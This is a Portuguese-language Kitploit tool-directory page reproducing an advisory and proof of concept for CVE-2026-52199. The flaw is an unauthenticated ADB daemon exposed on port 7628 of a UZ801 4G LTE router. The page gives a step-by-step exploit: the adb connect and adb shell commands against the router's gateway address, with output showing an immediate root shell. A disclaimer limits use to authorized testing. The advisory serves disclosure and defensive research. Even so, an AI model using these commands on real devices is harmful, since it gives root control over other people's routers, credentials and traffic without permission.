Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2026-52199 — Exploit de prova de conceito para CVE-2026-52199: execução remota de código não autenticada através do daemon ADB exposto no roteador UZ801 4G LTE. Inclui análise de vulnerabilidade, avaliação de impacto e guia de exploração passo a passo para testes de segurança autorizados. | Kitploit
Ferramentas/GitHubGitHub/lamaper/cve-2026-52199
Escalada de PrivilégiosAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoAprendizado e EducaçãoFerramenta de Acesso RemotoLabs e Prática
GitHublamaper/cve-2026-52199

CVE-2026-52199

Exploit de prova de conceito para CVE-2026-52199: execução remota de código não autenticada através do daemon ADB exposto no roteador UZ801 4G LTE. Inclui análise de vulnerabilidade, avaliação de impacto e guia de exploração passo a passo para testes de segurança autorizados.

há 1 mêsAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

CVE-2026-52199 : Execução Remota de Código Não Autenticada no Roteador 4G UZ801

Resumo da Vulnerabilidade

Existe uma vulnerabilidade crítica de Controle de Acesso Incorreto no Roteador 4G LTE Generic OEM UZ801_v2.1 (Firmware V3.4.3). O dispositivo expõe indevidamente um daemon Android Debug Bridge (ADB) não autenticado (/sbin/adbd) na porta TCP 7628 para a rede adjacente (LAN/WiFi).

hardware_pcb

Um atacante conectado à rede local do dispositivo pode explorar essa falha para contornar todos os mecanismos de autenticação, estabelecer uma conexão ADB e executar código arbitrário com privilégios root.

evidence

Produto Afetado

  • Fabricante: Ecossistema Generic OEM / White-label
  • Produto: Roteador 4G LTE UZ801_v2.1
  • Versão: V3.4.3
  • Componente Vulnerável: /sbin/adbd

Impacto

A exploração desta vulnerabilidade leva a um comprometimento completo do sistema. O impacto inclui:

  • Execução Remota de Código (RCE): Verdadeiro
  • Escalação de Privilégios: Verdadeiro (Diretamente para um shell root)
  • Divulgação de Informações: Verdadeiro (Acesso total ao sistema de arquivos interno e credenciais)
  • Negação de Serviço (DoS): Verdadeiro (Capacidade de inutilizar ou manipular o dispositivo)

Prova de Conceito (PoC)

O processo de exploração não requer ferramentas especiais além do cliente adb padrão e acesso à rede adjacente.

Passo 1: Conecte-se à rede WiFi do roteador UZ801 (o Gateway padrão geralmente é 192.168.100.1).

Passo 2: Escaneie o dispositivo em busca de portas abertas. A porta 7628/TCP será reportada como aberta.

Passo 3: A partir da máquina do atacante, inicie uma conexão ADB para a porta não documentada:

root@kitploit:~
$ adb connect 192.168.100.1:7628
* daemon not running; starting now at tcp:5037
* daemon started successfully
connected to 192.168.100.1:7628

Passo 4: Solicite um shell interativo:

root@kitploit:~
$ adb -s 192.168.100.1:7628 shell

Passo 5: O atacante é imediatamente colocado em um shell root sem nenhum prompt de autenticação:

root@kitploit:~
root@msm8916_32_512:/ # id
uid=0(root) gid=0(root) context=u:r:su:s0
root@msm8916_32_512:/ # uname -a
Linux localhost 3.10.49 #1 SMP PREEMPT ... aarch64

Aviso Legal

Apenas para Fins Educacionais e de Pesquisa de Segurança Autorizada. As informações e a prova de conceito fornecidas neste repositório destinam-se exclusivamente a fins educacionais e para ajudar a proteger redes. O autor (lamaper) não é responsável por qualquer uso indevido dessas informações. Não use este exploit contra dispositivos ou redes que você não possui ou para os quais não tem permissão explícita para testar.

Baixar ferramenta